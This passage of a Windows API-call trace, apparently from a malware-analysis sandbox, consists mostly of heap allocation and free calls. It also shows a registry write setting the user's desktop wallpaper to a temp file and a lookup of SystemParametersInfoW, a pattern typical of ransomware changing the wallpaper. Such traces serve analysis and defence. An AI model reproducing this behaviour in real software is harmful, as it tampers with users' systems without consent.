lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0240.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0240.318] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0240.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.319] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0240.319] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0240.319] RegCloseKey (hKey=0x4e0) returned 0x0 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731b0 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0240.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0240.320] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0240.320] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0240.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0240.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0240.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0240.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0240.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0240.323] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0240.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0240.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0240.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0240.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0240.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0240.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0240.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0240.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0240.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0240.327] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0240.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0240.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f00 [0240.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f00, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0240.328] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0240.328] HeapFree (in: 